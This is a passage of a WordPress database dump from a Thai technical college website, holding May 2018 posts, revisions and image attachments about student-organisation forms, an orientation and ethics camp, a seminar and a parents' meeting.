(2710, 1, '2018-05-23 09:15:44', '2018-05-23 02:15:44', '<h1><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.2</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h1>\r\n<h1></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h1>\r\n<h1><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h1>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-23 09:15:44', '2018-05-23 02:15:44', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0),
(2711, 1, '2018-05-23 09:16:00', '2018-05-23 02:16:00', '<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"http://www.technicrayong.ac.th/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-23 09:16:00', '2018-05-23 02:16:00', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2712, 3, '2018-05-23 11:13:50', '2018-05-23 04:13:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577688539274005%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการประชุมสัมมนาเครือข่ายองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ต่อการขับเคลื่อนงานเสริมสร้างคุณธรรม ภายใต้การดำเนินงานโครงการอนุรักษ์พันธุกรรมพืชอันเนื่องมาจากพระราชดำริฯ (อพ.สธ.-สอศ.) ได้จัดขึ้นระหว่างวันที่ 29-30 เมษายน 2561 ที่ผ่านมา ณ ห้องประชุมวิทยาลัยการอาชีวศึกษาปทุมธานี', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a1%e0%b8%99%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a3', '', '', '2018-05-23 11:13:50', '2018-05-23 04:13:50', '', 0, 'http://www.technicrayong.ac.th/?p=2712', 418, 'post', '', 0),
(2713, 3, '2018-05-23 11:13:36', '2018-05-23 04:13:36', '', '31729936_577688159274043_8460682417424826368_o', '', 'inherit', 'closed', 'closed', '', '31729936_577688159274043_8460682417424826368_o', '', '', '2018-05-23 11:13:36', '2018-05-23 04:13:36', '', 2712, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31729936_577688159274043_8460682417424826368_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2714, 3, '2018-05-23 11:13:50', '2018-05-23 04:13:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577688539274005%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการประชุมสัมมนาเครือข่ายองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ต่อการขับเคลื่อนงานเสริมสร้างคุณธรรม ภายใต้การดำเนินงานโครงการอนุรักษ์พันธุกรรมพืชอันเนื่องมาจากพระราชดำริฯ (อพ.สธ.-สอศ.) ได้จัดขึ้นระหว่างวันที่ 29-30 เมษายน 2561 ที่ผ่านมา ณ ห้องประชุมวิทยาลัยการอาชีวศึกษาปทุมธานี', '', 'inherit', 'closed', 'closed', '', '2712-revision-v1', '', '', '2018-05-23 11:13:50', '2018-05-23 04:13:50', '', 2712, 'http://www.technicrayong.ac.th/2712-revision-v1/', 0, 'revision', '', 0),
(2715, 3, '2018-05-23 11:14:03', '2018-05-23 04:14:03', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D577688539274005%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการประชุมสัมมนาเครือข่ายองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ต่อการขับเคลื่อนงานเสริมสร้างคุณธรรม ภายใต้การดำเนินงานโครงการอนุรักษ์พันธุกรรมพืชอันเนื่องมาจากพระราชดำริฯ (อพ.สธ.-สอศ.) ได้จัดขึ้นระหว่างวันที่ 29-30 เมษายน 2561 ที่ผ่านมา ณ ห้องประชุมวิทยาลัยการอาชีวศึกษาปทุมธานี', '', 'inherit', 'closed', 'closed', '', '2712-autosave-v1', '', '', '2018-05-23 11:14:03', '2018-05-23 04:14:03', '', 2712, 'http://www.technicrayong.ac.th/2712-autosave-v1/', 0, 'revision', '', 0),
(2716, 3, '2018-05-23 11:18:00', '2018-05-23 04:18:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 นักเรียนชายและหญิง ระดับ ปวช.1 ระหว่างวันที่ 1-5 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2', '', '', '2018-05-23 11:25:10', '2018-05-23 04:25:10', '', 0, 'http://www.technicrayong.ac.th/?p=2716', 417, 'post', '', 0),
(2717, 3, '2018-05-23 11:18:00', '2018-05-23 04:18:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 รุ่นที่ 1 ระดับ ปวช.1 (นักเรียนชาย) ระหว่างวันที่ 1-3 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '2716-revision-v1', '', '', '2018-05-23 11:18:00', '2018-05-23 04:18:00', '', 2716, 'http://www.technicrayong.ac.th/2716-revision-v1/', 0, 'revision', '', 0),
(2718, 3, '2018-05-23 11:25:19', '2018-05-23 04:25:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 นักเรียนชายและหญิง ระดับ ปวช.1 ระหว่างวันที่ 1-5 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '2716-autosave-v1', '', '', '2018-05-23 11:25:19', '2018-05-23 04:25:19', '', 2716, 'http://www.technicrayong.ac.th/2716-autosave-v1/', 0, 'revision', '', 0),
(2719, 3, '2018-05-23 11:20:06', '2018-05-23 04:20:06', '', '31755393_577707672605425_9154701174853599232_o', '', 'inherit', 'closed', 'closed', '', '31755393_577707672605425_9154701174853599232_o', '', '', '2018-05-23 11:20:06', '2018-05-23 04:20:06', '', 2716, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31755393_577707672605425_9154701174853599232_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2720, 3, '2018-05-23 11:23:29', '2018-05-23 04:23:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 รุ่นที่ 1 และ รุ่นที่ 2 ระดับ ปวช.1 (นักเรียนชาย) ระหว่างวันที่ 1-5 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '2716-revision-v1', '', '', '2018-05-23 11:23:29', '2018-05-23 04:23:29', '', 2716, 'http://www.technicrayong.ac.th/2716-revision-v1/', 0, 'revision', '', 0),
(2721, 3, '2018-05-23 11:24:32', '2018-05-23 04:24:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 รุ่นที่ 1 และ รุ่นที่ 2 ระดับ ปวช.1 ระหว่างวันที่ 1-5 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '2716-revision-v1', '', '', '2018-05-23 11:24:32', '2018-05-23 04:24:32', '', 2716, 'http://www.technicrayong.ac.th/2716-revision-v1/', 0, 'revision', '', 0),
(2722, 3, '2018-05-23 11:25:10', '2018-05-23 04:25:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.577712905938235%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D578168722559320%26id%3D100010985913485&width=500\" width=\"500\" height=\"700\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2F100001120904600%2Fvideos%2F1770241583023188%2F&show_text=0&width=560\" width=\"560\" height=\"315\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></p>', 'โครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2561 นักเรียนชายและหญิง ระดับ ปวช.1 ระหว่างวันที่ 1-5 พฤษภาคม 2561 ณ วัดมาบตาพุด ตำบลมาบตาพุด อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '2716-revision-v1', '', '', '2018-05-23 11:25:10', '2018-05-23 04:25:10', '', 2716, 'http://www.technicrayong.ac.th/2716-revision-v1/', 0, 'revision', '', 0),
(2723, 3, '2018-05-23 11:40:27', '2018-05-23 04:40:27', '<img class=\"wp-image-2730 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o-1024x642.jpg\" alt=\"\" width=\"640\" height=\"401\" /> <img class=\"wp-image-2727 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2731 size-large\" src=\"/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2726 size-large\" src=\"/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2724 size-large\" src=\"/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2729 size-large\" src=\"/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2725 size-large\" src=\"/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2728 size-large\" src=\"/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583114088731450%26id%3D100010985913485&width=500\" width=\"500\" height=\"816\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<span style=\"color: #0000ff;\">ดูรูปภาพเพิ่มเติม ได้ที่ FB งานประชาสัมพันธ์ วท.ระยอง</span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.580071409035718&type=3\"><span style=\"color: #ff0000;\">>>คลิก</span></a>', 'การประชุมเครือข่ายผู้ปกครอง นักเรียนระดับชั้น ปวช.1 และ ปวส.1 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอาทิตย์ที่ 6 และ 13 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b', '', '', '2018-05-23 11:44:06', '2018-05-23 04:44:06', '', 0, 'http://www.technicrayong.ac.th/?p=2723', 416, 'post', '', 0),
(2724, 3, '2018-05-23 11:35:46', '2018-05-23 04:35:46', '', '31960619_580078705701655_3009427663833006080_o', '', 'inherit', 'closed', 'closed', '', '31960619_580078705701655_3009427663833006080_o', '', '', '2018-05-23 11:35:46', '2018-05-23 04:35:46', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2725, 3, '2018-05-23 11:35:51', '2018-05-23 04:35:51', '', '31946440_580075529035306_5860757633039859712_o', '', 'inherit', 'closed', 'closed', '', '31946440_580075529035306_5860757633039859712_o', '', '', '2018-05-23 11:35:51', '2018-05-23 04:35:51', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2726, 3, '2018-05-23 11:35:56', '2018-05-23 04:35:56', '', '31958716_580075182368674_6625282560714866688_o', '', 'inherit', 'closed', 'closed', '', '31958716_580075182368674_6625282560714866688_o', '', '', '2018-05-23 11:35:56', '2018-05-23 04:35:56', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2727, 3, '2018-05-23 11:35:59', '2018-05-23 04:35:59', '', '31961281_580067749036084_2144024640253591552_o', '', 'inherit', 'closed', 'closed', '', '31961281_580067749036084_2144024640253591552_o', '', '', '2018-05-23 11:35:59', '2018-05-23 04:35:59', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2728, 3, '2018-05-23 11:36:01', '2018-05-23 04:36:01', '', '31957893_580074842368708_4608907316320796672_o', '', 'inherit', 'closed', 'closed', '', '31957893_580074842368708_4608907316320796672_o', '', '', '2018-05-23 11:36:01', '2018-05-23 04:36:01', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2729, 3, '2018-05-23 11:36:04', '2018-05-23 04:36:04', '', '31967910_580074732368719_894167463237779456_o', '', 'inherit', 'closed', 'closed', '', '31967910_580074732368719_894167463237779456_o', '', '', '2018-05-23 11:36:04', '2018-05-23 04:36:04', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2730, 3, '2018-05-23 11:36:12', '2018-05-23 04:36:12', '', '31957321_580067059036153_2076923867971977216_o', '', 'inherit', 'closed', 'closed', '', '31957321_580067059036153_2076923867971977216_o', '', '', '2018-05-23 11:36:12', '2018-05-23 04:36:12', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2731, 3, '2018-05-23 11:36:15', '2018-05-23 04:36:15', '', '31964236_580067762369416_3093648626728042496_o', '', 'inherit', 'closed', 'closed', '', '31964236_580067762369416_3093648626728042496_o', '', '', '2018-05-23 11:36:15', '2018-05-23 04:36:15', '', 2723, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2732, 3, '2018-05-23 11:40:27', '2018-05-23 04:40:27', '<img class=\"wp-image-2730 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o-1024x642.jpg\" alt=\"\" width=\"640\" height=\"401\" /> <img class=\"wp-image-2727 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2731 size-large\" src=\"/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2726 size-large\" src=\"/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2724 size-large\" src=\"/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2729 size-large\" src=\"/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2725 size-large\" src=\"/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2728 size-large\" src=\"/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n \r\n\r\n<span style=\"color: #0000ff;\">ดูรูปภาพเพิ่มเติม ได้ที่ FB งานประชาสัมพันธ์ วท.ระยอง</span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.580071409035718&type=3\"><span style=\"color: #ff0000;\">>>คลิก</span></a>', 'การประชุมเครือข่ายผู้ปกครอง นักเรียนระดับชั้น ปวช.1 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561งานประชาสัมพันธ์ วท.ระยอง วันอาทิตย์ที่ 6 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2723-revision-v1', '', '', '2018-05-23 11:40:27', '2018-05-23 04:40:27', '', 2723, 'http://www.technicrayong.ac.th/2723-revision-v1/', 0, 'revision', '', 0),
